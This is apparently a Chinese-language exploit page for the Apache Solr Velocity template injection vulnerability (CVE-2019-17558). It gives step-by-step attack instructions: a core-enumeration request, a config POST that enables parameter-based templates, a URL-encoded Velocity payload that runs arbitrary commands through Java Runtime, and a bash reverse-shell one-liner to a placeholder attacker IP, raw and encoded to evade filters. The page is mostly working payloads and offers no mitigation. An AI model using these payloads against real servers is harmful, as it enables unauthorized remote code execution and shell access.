Solr Velocity 注入远程命令执行漏洞 (CVE 2019 17558)

漏洞概述¶

攻击者通过未授权访问solr服务器，可以注入自定义模板，通过Velocity模板语言执行任意命令

发送特定的数据包开启 params.resource.loader.enabled，然后get访问接口执行命令

影响范围¶

5.0.0 ~ 8.3.1版本

POC&EXP¶

python CVE-2019-17558.py

图形化工具：https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool

漏洞利用¶

1、默认情况下params.resource.loader.enabled配置未打开，无法使用自定义模板

先通过如下API获取所有的核心：

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

2、通过如下请求开启params.resource.loader.enabled，其中API路径包含刚才获取的core名称

POST /solr/demo/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

3、之后，注入Velocity模板即可执行任意命令

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

4、反弹hell

因为部分命令会被过滤导致返回 Error 500 ，所以反弹shell需要用另外的反弹shell方法

POC : /bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/xxx.xxx.xxx.xxx:9999 0>&1

POC需要Urlencoding进行编码才能绕过
POC ： %2Fbin%2Fbash%20-c%20%24%40%7Cbash%200%20echo%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F{IP}%2F{PORT}%200%3E%261

漏洞分析¶

https://xz.aliyun.com/t/6700#toc-4